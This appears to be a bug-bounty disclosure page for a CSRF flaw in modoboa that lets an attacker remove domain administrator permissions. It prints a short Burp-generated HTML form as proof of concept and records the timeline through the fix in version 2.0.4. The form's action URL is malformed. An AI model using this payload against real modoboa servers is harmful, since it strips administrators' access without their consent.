CSRF leading to remove Administrators users in modoboa/modoboa


Reported on

Jan 21st 2023


remove function is vulnerable to CSRF lead to remove any Administrators users GET /admin/permissions/remove/?domid=2&daid=15

Proof of Concept

1/ visit /admin/domains/1/

2/ delete button to remove permission is vulnerable to CSRF


3 visit POC by changing value will remove administrator username

  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <script>history.pushState('', '', '/')</script>
    <form action="https//l27.0.0.1/admin/permissions/remove/">
      <input type="hidden" name="domid" value="2" />
      <input type="hidden" name="daid" value="15" />
      <input type="submit" value="Submit request" />


cause the same by deleting the administrative username in




Allows an attacker to induce users to perform actions that they do not intend to perform


We are processing your report and will contact the modoboa team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
0ozero0 modified the report
a year ago
0ozero0 modified the report
a year ago
We have contacted a member of the modoboa team and are waiting to hear back a year ago
modoboa/modoboa maintainer validated this vulnerability a year ago
0ozero0 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
modoboa/modoboa maintainer
a year ago


Here is a fix: https://github.com/modoboa/modoboa/pull/2758

a year ago


Hi @maintainer Yes looks fixed .

modoboa/modoboa maintainer marked this as fixed in 2.0.4 with commit 38d778 a year ago
The fix bounty has been dropped
This vulnerability has now been published a year ago
domain.py#L2 has been validated
to join this conversation